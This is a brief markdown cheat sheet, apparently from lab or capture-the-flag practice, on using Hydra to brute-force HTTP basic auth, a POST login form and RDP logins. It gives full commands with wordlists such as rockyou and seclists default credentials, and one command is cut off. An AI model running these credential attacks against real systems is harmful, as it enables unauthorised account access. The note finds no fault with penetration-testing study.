# Hydra ## Hydra Supported Services ```bash hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e ```
## HTTP AUTH Bruteforce We can use hydra to pass it colon seperated wordlist with default credentials and we can try to do a bruteforce attack on the http login, i will use the wordlist from seclists which containes the **default credentials by colon seperation** ```python hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt http-get://94.237.53.3:40213/ ```

Successfull Login using the creds found

## Hydra POST Form BruteForce Attack If you have a login page and you need to bruteforce the creds for that, one way is you can use the burpsuite Intruder, the Second thing which we can use is Hydra Post Form as well there are 3 things we need to add after http-post-form, -s is for port 1. Login Endpoint 2. Parameters 3. Fail or success msg OR Something from Page Source ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 94.237.63.83 -s 51867 http-post-form "/login.php:username=^USER^&password=^PASS^:
## Hydra on RDP Port 3389 ```python hydra -L users.txt -P passwords.txt rdp://127.0.0.1 ``` ### Hydra on RDP with Multipe IPs ``` hydra -L users.txt -P passwords.txt -M IPs.txt rdp ```